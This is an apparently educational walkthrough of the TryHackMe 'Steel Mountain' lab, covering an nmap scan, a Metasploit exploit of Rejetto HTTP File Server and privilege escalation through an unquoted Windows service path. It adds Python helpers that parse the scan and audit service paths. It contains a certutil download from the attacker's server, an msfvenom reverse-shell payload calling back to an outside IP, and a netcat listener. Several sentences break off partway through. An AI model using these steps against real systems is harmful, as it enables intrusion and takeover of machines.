This walkthrough covers the Steel Mountain CTF found on TryHackMe. This room is designed to evaluate our Windows OS enumeration skills. We will utilize Metasploit to gain an initial foothold, followed by PowerShell to enumerate the machine and escalate our privileges to Administrator.
Step 1: Nmap
Note: ICMP is disabled, so we'll have to use the
nmap -Pn -p- 10.10.0.5 -vvv
PORT      STATE SERVICE       REASON
80/tcp    open  http          syn-ack ttl 125
135/tcp   open  msrpc         syn-ack ttl 125
139/tcp   open  netbios-ssn   syn-ack ttl 125
445/tcp   open  microsoft-ds  syn-ack ttl 125
3389/tcp  open  ms-wbt-server syn-ack ttl 125
5985/tcp  open  wsman         syn-ack ttl 125
8080/tcp  open  http-proxy    syn-ack ttl 125
47001/tcp open  winrm         syn-ack ttl 125
49152/tcp open  unknown       syn-ack ttl 125
49153/tcp open  unknown       syn-ack ttl 125
49154/tcp open  unknown       syn-ack ttl 125
49155/tcp open  unknown       syn-ack ttl 125
49156/tcp open  unknown       syn-ack ttl 125
49169/tcp open  unknown       syn-ack ttl 125
49170/tcp open  unknown       syn-ack ttl 125
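As an added example (not part of the original walkthrough), here is a small Python parser for the nmap port table above. It turns each port line into a record, picks out the HTTP services, separates the Windows RPC dynamic-range ports, and converts the "ttl 125" in the reason column into the usual initial-TTL guess (Windows defaults to 128, so 125 suggests about three hops), which is consistent with the Windows target this room describes.

```python
"""Parse an nmap port table and derive quick facts from it.

Added example; the port table below is copied from the scan output in the
walkthrough, everything else is illustrative code, not nmap's own.
"""
import re
from collections import Counter

# Port table exactly as printed by the scan in the walkthrough.
NMAP_OUTPUT = """\
PORT      STATE SERVICE       REASON
80/tcp    open  http          syn-ack ttl 125
135/tcp   open  msrpc         syn-ack ttl 125
139/tcp   open  netbios-ssn   syn-ack ttl 125
445/tcp   open  microsoft-ds  syn-ack ttl 125
3389/tcp  open  ms-wbt-server syn-ack ttl 125
5985/tcp  open  wsman         syn-ack ttl 125
8080/tcp  open  http-proxy    syn-ack ttl 125
47001/tcp open  winrm         syn-ack ttl 125
49152/tcp open  unknown       syn-ack ttl 125
49153/tcp open  unknown       syn-ack ttl 125
49154/tcp open  unknown       syn-ack ttl 125
49155/tcp open  unknown       syn-ack ttl 125
49156/tcp open  unknown       syn-ack ttl 125
49169/tcp open  unknown       syn-ack ttl 125
49170/tcp open  unknown       syn-ack ttl 125
"""

# "80/tcp open http syn-ack ttl 125" -> port, proto, state, service, reason
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s+(?P<reason>.*)$"
)
TTL_RE = re.compile(r"\bttl (\d+)\b")


def parse_nmap(text):
    """Return one dict per port line; header and blank lines are skipped."""
    records = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["port"] = int(rec["port"])
        ttl = TTL_RE.search(rec["reason"])
        rec["ttl"] = int(ttl.group(1)) if ttl else None
        records.append(rec)
    return records


def guess_initial_ttl(observed):
    """Map an observed TTL to the nearest common initial TTL and hop count.

    Common defaults: 64 (Linux/BSD), 128 (Windows), 255 (network gear).
    """
    for initial in (64, 128, 255):
        if observed <= initial:
            return initial, initial - observed
    return None, None


def summarize(records):
    """Pull out the facts a tester reads off the table by eye."""
    open_ports = [r for r in records if r["state"] == "open"]
    web = sorted(r["port"] for r in open_ports if r["service"].startswith("http"))
    # 49152-65535 is the Windows RPC dynamic port range (the "unknown" rows).
    ephemeral = sorted(r["port"] for r in open_ports if 49152 <= r["port"] <= 65535)
    ttls = Counter(r["ttl"] for r in open_ports if r["ttl"] is not None)
    initial, hops = guess_initial_ttl(ttls.most_common(1)[0][0]) if ttls else (None, None)
    return {
        "open_count": len(open_ports),
        "web_ports": web,
        "rpc_ephemeral_ports": ephemeral,
        "ttl_guess": {"initial": initial, "hops": hops},
    }


if __name__ == "__main__":
    for key, value in summarize(parse_nmap(NMAP_OUTPUT)).items():
        print(f"{key}: {value}")
```

The same parser works on any `nmap` normal-output port table; the TTL guess is only a hint (it assumes the target did not change its default TTL), but combined with ports 135/139/445/5985 it is a reliable tell for a Windows host.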
From this scan, we can tell that there are two web servers, one of which will be our attack vector to get an initial foothold. Visiting the site on port 80 reveals nothing more than a static page for an employee of the month. Looking at the source code helps us identify a name, Bill Harper.
Moving on over to port 8080 proves to be a little more useful. Right off the bat, we can tell this is a user panel to an HTTP File Server.
Looking at the source code helps us narrow it down to a Rejetto HTTP File Server. This is great news because this version is vulnerable to an RCE and Metasploit has a module for it called
Step 2: Metasploit
From here we want to search for the rejetto module and configure the options.
After properly configuring the module and typing exploit, we get a meterpreter session and pop a shell to grab our first flag located in
Use type user.txt to view it from the command line.
Step 3: Privilege Escalation
To enumerate this machine, we will use winPEAS. You can download the latest version here.
Start a Python server:
python3 -m http.server 8000
Transfer winPEAS to the victim's C:\Users\bill\Desktop directory using certutil:
certutil.exe -urlcache -f http://10.13.28.215:8000/winPEASany_ofs.exe winPEASany_ofs.exe
Run it by typing
An interesting service called AdvancedSystemCareService9 is missing quotes around its executable path, which contains a space. This means we can escape the intended path and have the service run a program of ours called "Advanced.exe" containing a reverse shell.
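The check that winPEAS performed here, as an added Python example that is neither the walkthrough's nor winPEAS's own code: given a service's ImagePath it reproduces the order in which Windows probes candidate executables when the path is unquoted and contains spaces, reports the writable-directory risk at each step, and returns the quoted path that fixes the service. The sample service list is constructed; the IObit path is a plausible reconstruction, since the walkthrough only gives the service name, the "C:\Program Files (x86)\IObit\" directory and the "Advanced.exe" hijack name.

```python
"""Audit service ImagePaths for the unquoted-path weakness.

Added example. Windows' CreateProcess, given an unquoted command line with
spaces, tries each space-delimited prefix with ".exe" appended before it
reaches the intended binary; the first candidate that exists on disk wins.
"""
from dataclasses import dataclass


@dataclass
class Finding:
    service: str
    image_path: str
    candidates: list  # executables Windows would probe, in order
    fix: str          # ImagePath with the executable properly quoted


def split_image_path(image_path):
    """Return (exe_part, args_part, was_quoted) for a service ImagePath."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end == -1:                      # malformed: opening quote only
            return s[1:], "", True
        return s[1:end], s[end + 1:].strip(), True
    # Unquoted: treat the first token ending in .exe as the end of the
    # executable; whatever follows is arguments.
    tokens = s.split()
    for i, tok in enumerate(tokens):
        if tok.lower().endswith(".exe"):
            return " ".join(tokens[: i + 1]), " ".join(tokens[i + 1:]), False
    return s, "", False


def unquoted_candidates(exe_part):
    """List the paths Windows would try, in order, for an unquoted exe path."""
    tokens = exe_part.split()
    candidates = []
    acc = tokens[0]
    for tok in tokens[1:]:
        candidates.append(acc + ".exe")    # e.g. C:\Program.exe
        acc = acc + " " + tok
    candidates.append(acc)                 # the intended binary, tried last
    return candidates


def audit_services(services):
    """Return a Finding for every (name, ImagePath) pair that is exploitable."""
    findings = []
    for name, image_path in services:
        exe, args, quoted = split_image_path(image_path)
        if quoted or " " not in exe:
            continue                       # quoted, or no space to abuse
        fix = f'"{exe}"' + (f" {args}" if args else "")
        findings.append(Finding(name, image_path, unquoted_candidates(exe), fix))
    return findings


# Constructed sample: one vulnerable IObit-style path (reconstructed, see
# lead-in), one safe system service, one correctly quoted path, and one
# unquoted path that also carries arguments.
SAMPLE_SERVICES = [
    ("AdvancedSystemCareService9",
     r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe"),
    ("QuotedSvc", r'"C:\Program Files\Vendor App\svc.exe" --service'),
    ("ArgsSvc", r"C:\Tools\Some Vendor\agent.exe -config C:\Tools\Some Vendor\a.cfg"),
]


if __name__ == "__main__":
    for f in audit_services(SAMPLE_SERVICES):
        print(f"[!] {f.service}: {f.image_path}")
        for c in f.candidates[:-1]:
            print(f"    would run first if present: {c}")
        print(f"    fix: {f.fix}")
```

On a real host the same (Name, PathName) pairs come from Get-CimInstance Win32_Service, and the remediation is to quote the binary path with sc config <name> binPath= and, just as importantly, to make sure no directory along the chain is writable by unprivileged users, since the first existing candidate is the one that runs.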
Let's fire up msfvenom and generate a payload.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.13.28.215 LPORT=1337 -f exe -o Advanced.exe
Start up a Python server and transfer the payload over using
Move it to "C:\Program Files (x86)\IObit\", and be sure to put the file path in quotes due to the space.
Now we want to stop the
Start a netcat listener to catch the reverse shell.
nc -lvnp 1337
AdvancedSystemCareService9 service back up.
Step 4: Root
Pwned! From here we can grab the last flag found in